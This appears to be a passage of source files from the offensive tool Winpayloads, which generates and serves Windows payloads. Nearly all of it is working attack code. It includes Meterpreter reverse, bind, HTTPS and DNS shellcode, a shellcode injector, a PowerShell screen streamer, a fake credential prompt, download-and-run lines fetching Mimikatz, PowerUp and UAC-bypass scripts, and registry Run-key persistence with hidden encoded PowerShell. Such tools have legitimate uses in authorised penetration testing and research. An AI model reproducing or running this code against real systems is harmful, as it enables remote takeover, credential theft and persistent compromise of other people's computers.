"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" 76 | "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" 77 | "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" 78 | "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" 79 | "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" 80 | "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" 81 | "\xff\xd5\x6a\x05\x68%s\x68\x02\x00%s" #ip,port 82 | "\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" 83 | "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5" 84 | "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec" 85 | "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02" 86 | "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a" 87 | "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53" 88 | "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9" 89 | "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40" 90 | "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57" 91 | "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9" 92 | "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0" 93 | "\xb5\xa2\x56\x6a\x00\x53\xff\xd5") 94 | 95 | windows_met_bind_shell = ( 96 | "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 97 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 98 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" 99 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 100 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" 101 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" 102 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" 103 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 104 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" 105 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" 106 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" 107 | "\x29\x80\x6b\x00\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a" 108 | "\x02\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00%s\x89" #port 109 | "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x85\xc0\x75" 110 | "\x58\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1" 111 | "\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04" 112 | "\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x2d\x8b" 113 | "\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53" 114 | "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f" 115 | "\xff\xd5\x83\xf8\x00\x7e\x07\x01\xc3\x29\xc6\x75\xe9\xc3") 116 | 117 | windows_met_rev_https_shell = ( 118 | "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 119 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 120 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" 121 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 122 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" 123 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" 124 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" 125 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 126 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" 127 | "\x8d\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c" 128 | "\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56" 129 | "\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68%s\x00\x00" #port 130 | "\xe8\x8c\x00\x00\x00\x2f\x53\x32\x49\x34\x5a\x00\x50\x68\x57" 131 | "\x89\x9f\xc6\xff\xd5\x89\xc6\x53\x68\x00\x32\xe0\x84\x53\x53" 132 | "\x53\x57\x53\x56\x68\xeb\x55\x2e\x3b\xff\xd5\x96\x6a\x0a\x5f" 133 | "\x68\x80\x33\x00\x00\x89\xe0\x6a\x04\x50\x6a\x1f\x56\x68\x75" 134 | "\x46\x9e\x86\xff\xd5\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b" 135 | "\xff\xd5\x85\xc0\x75\x0a\x4f\x75\xd9\x68\xf0\xb5\xa2\x56\xff" 136 | "\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68" 137 | "\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20" 138 | "\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd" 139 | "\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x75\xff\xff" 140 | "\xff%s\x00") #ip 141 | 142 | windows_met_rev_shell_dns = ( 143 | "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 144 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 145 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" 146 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 147 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" 148 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" 149 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" 150 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 151 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" 152 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" 153 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" 154 | "\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" 155 | "\xea\x0f\xdf\xe0\xff\xd5\x97\xe8\x40\x00\x00\x00%s\x00" 156 | "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" 157 | "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" 158 | "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" 159 | "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" 160 | "\x00\x68\xa9\x28\x34\x80\xff\xd5\x8b\x40\x1c\x6a\x05\x50\x68" 161 | "\x02\x00%s\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61" 162 | "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2" 163 | "\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff" 164 | "\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58" 165 | "\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9" 166 | "\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3") 167 | 168 | windows_ps_rev_watch_screen = ( 169 | "Try{Add-Type -AssemblyName System.Windows.Forms;[System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream;" 170 | "$client = New-Object System.Net.Sockets.TCPClient('%s','%s');$stream = $client.GetStream();" 171 | "$ssl = New-Object System.Net.Security.SslStream $stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]);" 172 | "$ssl.AuthenticateAsClient($env:computername);Start-Sleep -s 1;function SendResponse($sock, $string){$bytesSent = $sock.Write($string)};" 173 | "function SendStrResponse($sock, $string){$bytesSent = $sock.Write([text.Encoding]::Ascii.GetBytes($string))};" 174 | "function SendHeader($sock,$length,$statusCode = \"200 OK\",$mimeHeader=\"text/html\",$httpVersion=\"HTTP/1.1\"){$response = \"HTTP/1.1 $statusCode`r`n\" + \"Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n\";" 175 | "SendStrResponse $sock $response;}SendHeader $ssl;" 176 | "While ($client.Connected){$b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);" 177 | "$g = [System.Drawing.Graphics]::FromImage($b);" 178 | "$g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size);" 179 | "$g.Dispose();$MemoryStream.SetLength(0);$b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg));" 180 | "$b.Dispose();$length = $MemoryStream.Length;[byte[]] $Bytes = $MemoryStream.ToArray();" 181 | "$str = \"`n`n--boundary`n\" + \"Content-Type: image/jpeg`n\" + \"Content-Length: $length`n`n\";" 182 | "SendStrResponse $ssl $str;SendResponse $ssl $Bytes};$MemoryStream.Close()}catch{Exit}") 183 | 184 | windows_ps_ask_creds_tcp = ( 185 | "$ErrorActionPreference=\'SilentlyContinue\';Add-Type -assemblyname system.DirectoryServices.accountmanagement;" 186 | "$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine);" 187 | "$domainDN = \'LDAP://\' + ([ADSI]\'\').distinguishedName;" 188 | "$credential = $host.ui.PromptForCredential(\'Credentials are required to perform this operation!\', \'\', \'\', \'\');" 189 | "if($credential){$creds = $credential.GetNetworkCredential();$user = $creds.username;$pass = $creds.password;" 190 | "echo \' INCORRECT:\'$user\':\'$pass;" 191 | "$authlocal = $DS.ValidateCredentials($user, $pass);" 192 | "$authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass);" 193 | "if(($authlocal -eq $true) -or ($authdomain.name -ne $null)){" 194 | "echo \' CORRECT:\'$user\':\'$pass}}") 195 | 196 | 197 | windows_invoke_mimikatz = ( 198 | "IEX (New-Object Net.WebClient).DownloadString(\\\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1\\\");" 199 | "Invoke-Mimikatz -DumpCreds") 200 | 201 | injectwindows = """shellcode = bytearray('%s') 202 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40)) 203 | buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) 204 | ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(shellcode))) 205 | ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0))) 206 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)) 207 | """ 208 | 209 | 210 | class FUNCTIONS(object): 211 | 212 | def powershellShellcodeLayout(self,powershellExec): 213 | powershellShellcode = re.sub(r'\\x', '0x', powershellExec) 214 | count = 0 215 | newpayloadlayout = '' 216 | for char in powershellShellcode: 217 | count += 1 218 | newpayloadlayout += char 219 | if count == 4: 220 | newpayloadlayout += ',' 221 | count = 0 222 | return newpayloadlayout 223 | 224 | def CheckInternet(self): 225 | try: 226 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 227 | s.connect(('8.8.8.8', 0)) 228 | IP = s.getsockname()[0] 229 | return IP 230 | except: 231 | return "0.0.0.0" 232 | 233 | def ServePayload(self, payloaddirectory, port): 234 | try: 235 | os.chdir(payloaddirectory) 236 | httpd = SocketServer.TCPServer(('', port), HANDLER) 237 | httpd.serve_forever() 238 | except: 239 | print t.bold_red + '\n[*] WebServer Error' + t.normal 240 | 241 | def DoServe(self, IP, payloadname, payloaddir, port, printIt): 242 | if printIt: 243 | print t.bold_green + "\n[*] Serving Payload On http://%s:%s/%s.exe" % (IP, port, payloadname) + t.normal 244 | a = multiprocessing.Process( 245 | target=self.ServePayload, args=(payloaddir, port)) 246 | a.daemon = True 247 | a.start() 248 | 249 | def randomUnusedPort(self): 250 | s = socket.socket() 251 | s.bind(('', 0)) 252 | port = s.getsockname()[1] 253 | s.close() 254 | return port 255 | 256 | def stagePowershellCode(self, powershellFileContents, port): 257 | DIR = 'stager' 258 | if not os.path.isdir(DIR): 259 | os.mkdir(DIR) 260 | os.chdir(DIR) 261 | with open('stage.ps1','w') as psFile: 262 | psFile.write(powershellFileContents) 263 | httpd = SocketServer.TCPServer(('', port), HANDLER) 264 | httpd.handle_request() 265 | os.chdir('..') 266 | import shutil 267 | shutil.rmtree(DIR) 268 | 269 | class Spinner(object): 270 | 271 | def __init__(self,text): 272 | self.spinner = [ 273 | ["|", "\\", "-", "/"], 274 | ["▁","▃","▄","▅","▆","▇","█","▇","▆","▅","▄","▃"], 275 | ["◡◡", "⊙⊙", "◠◠"], 276 | ["◐","◓","◑","◒"], 277 | ["▉","▊","▋","▌","▍","▎","▏","▎","▍","▌","▋","▊","▉"], 278 | [".","o","O","@","*"], 279 | ["◴","◷","◶","◵"], 280 | ["▖","▘","▝","▗"], 281 | ["←","↖","↑","↗","→","↘","↓","↙"], 282 | ["◢","◣","◤","◥"] 283 | ] 284 | self.loading = list(text) 285 | self.randomchoice = random.choice(self.spinner) 286 | self.spin_1 = len(self.randomchoice) 287 | self.spin_2 = len(self.loading) + 1 288 | self.x = 0 289 | 290 | def Looper(self, text): 291 | print t.bold_green, 292 | sys.stdout.write('\r') 293 | sys.stdout.write(text) 294 | print t.normal, 295 | sys.stdout.flush() 296 | 297 | def Update(self): 298 | self.spin_2mod = self.x % self.spin_2 299 | self.Looper(self.randomchoice[self.x % self.spin_1] + " " + "".join( 300 | self.loading[0: (self.spin_2mod)]) + (" " * (self.spin_2 - self.spin_2mod))) 301 | self.x += 1 302 | -------------------------------------------------------------------------------- /lib/menu.py: -------------------------------------------------------------------------------- 1 | from __future__ import unicode_literals 2 | from main import * 3 | from payloadextras import * 4 | from startmetasploit import * 5 | from generatepayload import * 6 | from preparepayload import * 7 | from stager import * 8 | from help import * 9 | 10 | class promptComplete(prompt_toolkit.completion.Completer): 11 | def __init__(self, choices): 12 | super(promptComplete, self).__init__() 13 | self.choices = choices 14 | 15 | def get_completions(self, document, complete_event): 16 | return [prompt_toolkit.completion.Completion(x, start_position=-document.cursor_position) for x in self.choices if x.startswith(document.text)] 17 | 18 | 19 | def menuRaise(): 20 | raise KeyboardInterrupt 21 | 22 | def noColourLen(colourString): 23 | return len(re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]').sub('', colourString)) 24 | 25 | def noColourCenter(colourString): 26 | len = (t.width / 2) - (noColourLen(colourString) /2 ) 27 | if len % 2 > 0: 28 | len -= 1 29 | return (' ' * len) + colourString 30 | 31 | def getAndRunPSMenu(): 32 | if len(clientMenuOptions) > 2: 33 | psMenu = MenuOptions(psMenuOptions, menuName="PS Menu") 34 | psMenu.runmenu() 35 | else: 36 | print t.bold_red + "[!] Clients are needed to access this menu" + t.normal 37 | return False 38 | 39 | def getAndRunClientMenu(): 40 | clientMenu = MenuOptions(clientMenuOptions, menuName="Client Menu") 41 | clientMenu.runmenu() 42 | return False 43 | 44 | def getAndRunMainMenu(): 45 | mainMenu = MenuOptions(mainMenuOptions, menuName="Main Menu") 46 | mainMenu.runmenu() 47 | return False 48 | 49 | def returnText(colour, text): 50 | print colour + text + t.normal 51 | 52 | mainMenuOptions = OrderedDict([ 53 | ('1', {'payloadchoice': SHELLCODE.windows_rev_shell, 'payload': 'Windows_Reverse_Shell', 'extrawork': reversePayloadGeneration, 'availablemodules': None, 'params': None}), 54 | ('2', {'payloadchoice': SHELLCODE.windows_met_rev_shell, 'payload': 'Windows_Meterpreter_Reverse_Shell', 'extrawork': reversePayloadGeneration, 'availablemodules': METASPLOIT_Functions['reverse'], 'params': None}), 55 | ('3', {'payloadchoice': SHELLCODE.windows_met_bind_shell, 'payload': 'Windows_Meterpreter_Bind_Shell', 'extrawork': bindPayloadGeneration, 'availablemodules': METASPLOIT_Functions['bind'], 'params': None}), 56 | ('4', {'payloadchoice': SHELLCODE.windows_met_rev_https_shell, 'payload': 'Windows_Meterpreter_Reverse_HTTPS', 'extrawork': httpsPayloadGeneration, 'availablemodules': METASPLOIT_Functions['https'], 'params': None}), 57 | ('5', {'payloadchoice': SHELLCODE.windows_met_rev_shell_dns, 'payload': 'Windows_Meterpreter_Reverse_Dns', 'extrawork': dnsPayloadGeneration, 'availablemodules': METASPLOIT_Functions['dns'], 'params': None}), 58 | ('ps', {'payloadchoice': None, 'payload': 'PowerShell Menu', 'extrawork': getAndRunPSMenu, 'params': None}), 59 | ('stager', {'payloadchoice': None, 'payload': 'Powershell Stager', 'extrawork': printListener, 'params': None}), 60 | ('clients', {'payloadchoice': None, 'payload': 'Stager Connected Clients', 'extrawork': getAndRunClientMenu, 'params': None, 'spacer': True}), 61 | ('?', {'payloadchoice': None, 'payload': 'Print Detailed Help', 'extrawork': winpayloads_help, 'params': None}), 62 | ('back', {'payloadchoice': None, 'payload': 'Main Menu', 'extrawork': getAndRunMainMenu, 'params': None}), 63 | ('exit', {'payloadchoice': None, 'payload': 'Exit', 'extrawork': menuRaise, 'params': None}), 64 | ]) 65 | 66 | psMenuOptions = OrderedDict([ 67 | ('1', {'payloadchoice': None, 'payload': 'Screen_Watch', 'extrawork': returnText , 'params': (t.bold_red, 'Module is borked...')}), 68 | ('2', {'payloadchoice': SHELLCODE.windows_ps_ask_creds_tcp, 'payload': 'Asks_Creds', 'extrawork': reversePowerShellAskCredsGeneration, 'params': None}), 69 | ('3', {'payloadchoice': SHELLCODE.windows_invoke_mimikatz, 'payload': 'Invoke_Mimikatz', 'extrawork': reversePowerShellInvokeMimikatzGeneration, 'params': None}), 70 | #('4', {'payloadchoice': SHELLCODE.windows_invoke_mimikatz, 'payload': 'UAC_Bypass', 'extrawork': reversePowerShellInvokeMimikatzGeneration, 'params': None}), 71 | ('clients', {'payloadchoice': None, 'payload': 'Connected Interpreter Clients', 'extrawork': getAndRunClientMenu, 'params': None}), 72 | ('back', {'payloadchoice': None, 'payload': 'Main Menu', 'extrawork': getAndRunMainMenu, 'params': None}), 73 | ]) 74 | 75 | clientMenuOptions = OrderedDict([ 76 | ('back', {'payloadchoice': None, 'payload': 'Main Menu', 'extrawork': getAndRunMainMenu, 'params': None}), 77 | ('r', {'payloadchoice': None, 'payload': 'Refresh', 'extrawork': getAndRunClientMenu, 'params': None}), 78 | ]) 79 | 80 | 81 | class MenuOptions(object): 82 | def __init__(self, choices, menuName): 83 | self.choices = choices 84 | self.menuName = menuName 85 | self.style = prompt_toolkit.styles.style_from_dict({ 86 | prompt_toolkit.token.Token: '#FFCC66' 87 | }) 88 | 89 | def _choose(self, n): 90 | if self.choices.has_key(n): 91 | return (True, self.choices[n]['payloadchoice'], self.choices[n]['payload'], self.choices[n]['extrawork'], self.choices[n]['params']) 92 | else: 93 | if not n == "": 94 | print t.bold_red + '[*] Wrong Selection' + t.normal 95 | return (False, None, None, None, None) 96 | 97 | def runmenu(self): 98 | self.printMenues(True) 99 | while True: 100 | user_choice = prompt_toolkit.prompt('%s > '%(self.menuName),style=self.style, patch_stdout=True, completer=promptComplete(self.choices)).rstrip(' ') 101 | success, payloadchoice, payload, extrawork, params = self._choose(user_choice) 102 | 103 | if not success: 104 | continue 105 | if extrawork: 106 | if payloadchoice: 107 | result = extrawork(payloadchoice,payload) 108 | elif params: 109 | result = extrawork(*params) 110 | else: 111 | result = extrawork() 112 | if result == "noclear": 113 | self.printMenues(False) 114 | if result == "clear": 115 | self.printMenues(True) 116 | if result == "pass": 117 | pass 118 | 119 | def printMenues(self,toClear): 120 | Splash(toClear) 121 | if t.width % 2 > 0: 122 | adjust = 0 123 | else: 124 | adjust = -1 125 | print t.bold_black + '=' * (t.width / 2 - (len(self.menuName) / 2)) + t.yellow + self.menuName + t.bold_black + '=' * (t.width / 2 - ((len(self.menuName) / 2)- adjust)) 126 | maxlen = 0 127 | arr = [] 128 | for i in self.choices.iterkeys(): 129 | menuPrintString = t.bold_yellow + str(i) + ': ' + t.normal + str(self.choices[i]['payload']).replace('_',' ') 130 | if 'availablemodules' in self.choices[i].keys() and self.choices[i]['availablemodules']: 131 | menuPrintString += t.bold_green + ' ' + str(self.choices[i]['availablemodules'].keys()).replace('\'','').replace('normal, ','') + t.normal 132 | if 'spacer' in self.choices[i]: 133 | menuPrintString += '\n' 134 | 135 | nocolourlen = noColourLen(menuPrintString) 136 | if nocolourlen > maxlen: 137 | maxlen = nocolourlen 138 | arr.append(menuPrintString) 139 | 140 | for i in arr: 141 | spacing = (t.width / 2) - (maxlen / 2) 142 | if spacing % 2 > 0: 143 | spacing -= 1 144 | if len(i) % 2 > 0: 145 | adjust = 0 146 | else: 147 | adjust = 1 148 | print (' '* spacing) + i + (' ' * (spacing - adjust)) 149 | print t.bold_black + '='*t.width + t.normal 150 | 151 | def Splash(toClear): 152 | if toClear: 153 | print t.clear 154 | print t.bold_red 155 | print noColourCenter("_ ___ ____ __ __") 156 | print noColourCenter(" | | / (_)___ / __ \____ ___ __/ /___ ____ _____/ /____") 157 | print noColourCenter(" | | /| / / / __ \/ /_/ / __ `/ / / / / __ \/ __ `/ __ / ___/") 158 | print noColourCenter(" | |/ |/ / / / / / ____/ /_/ / /_/ / / /_/ / /_/ / /_/ (__ )") 159 | print noColourCenter(" |__/|__/_/_/ /_/_/ \__,_/\__, /_/\____/\__,_/\__,_/____/") 160 | print noColourCenter(" /____/NCCGroup - CharlieDean" + t.normal) 161 | -------------------------------------------------------------------------------- /lib/payloadextras.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import re 3 | from main import * 4 | 5 | class EXTRAS(object): 6 | def __init__(self,shellcode): 7 | self.ez2read_shellcode = '' 8 | for byte in shellcode: 9 | self.ez2read_shellcode += '\\x%s' % byte.encode('hex') 10 | 11 | self.injectshellcode_layout = FUNCTIONS().powershellShellcodeLayout(self.ez2read_shellcode).rstrip(',') 12 | self.injectshellcode_sleep = """Start-Sleep -s 60;$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % ( 13 | self.injectshellcode_layout) 14 | self.injectshellcode_nosleep = """$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % ( 15 | self.injectshellcode_layout) 16 | 17 | def PERSISTENCE(self): 18 | with open('persist.ps1', 'w') as persistfile: 19 | persistfile.write("echo \"%s\" | out-file $env:USERPROFILE/update.txt;New-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name Updater -PropertyType String -Value 'C:\\Windows\\System32\WindowsPowerShell\\v1.0\\powershell.exe -c \"powershell -exec bypass -NonInteractive -WindowStyle Hidden -enc (Get-Content $env:USERPROFILE\update.txt)\"'" % base64.b64encode(self.injectshellcode_sleep.encode('utf_16_le'))) 20 | persistfile.close() 21 | with open('persist.rc', 'w') as persistfilerc: 22 | persistfilerc.write("""run post/windows/manage/exec_powershell SCRIPT=persist.ps1 SESSION=1""") 23 | persistfilerc.close() 24 | return self.ez2read_shellcode 25 | 26 | def UACBYPASS(self, version): 27 | randomPort = FUNCTIONS().randomUnusedPort() 28 | uacbypassrcfilecontents = """run post/windows/manage/exec_powershell SCRIPT="IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/stage.ps1')" SESSION=1"""% (FUNCTIONS().CheckInternet(), randomPort) 29 | if version == "7": 30 | uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("https://github.com/PowerShellEmpire/Empire/raw/master/data/module_source/privesc/Invoke-BypassUAC.ps1");\nInvoke-BypassUAC -Command \"powershell -enc %s\" """ % ( 31 | base64.b64encode(self.injectshellcode_nosleep.encode('utf_16_le'))) 32 | a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode, args=(uacbypassfilecontent, randomPort)) 33 | a.daemon = True 34 | a.start() 35 | elif version == "10": 36 | uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Charliedean/Invoke-SilentCleanUpBypass/master/Invoke-SilentCleanUpBypass.ps1");\nInvoke-SilentCleanUpBypass -Command \"cmd /c powershell -WindowStyle Hidden -enc %s && REM\" """ % ( 37 | base64.b64encode(self.injectshellcode_nosleep.encode('utf_16_le'))) 38 | a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode, args=(uacbypassfilecontent, randomPort)) 39 | a.daemon = True 40 | a.start() 41 | with open('uacbypass.rc', 'w') as uacbypassfilerc: 42 | uacbypassfilerc.write(uacbypassrcfilecontents) 43 | uacbypassfilerc.close() 44 | return self.ez2read_shellcode 45 | 46 | def ALLCHECKS(self): 47 | with open('allchecks.ps1', 'w') as allchecksfile: 48 | allchecksfile.write( 49 | """IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1");invoke-allchecks""") 50 | allchecksfile.close() 51 | return self.ez2read_shellcode 52 | 53 | def RETURN_EZ2READ_SHELLCODE(self): 54 | return self.ez2read_shellcode 55 | -------------------------------------------------------------------------------- /lib/powershell/stager.ps1: -------------------------------------------------------------------------------- 1 | #$ErrorActionPreference = 'SilentlyContinue' 2 | $byteAmount = New-Object Byte[] 10500 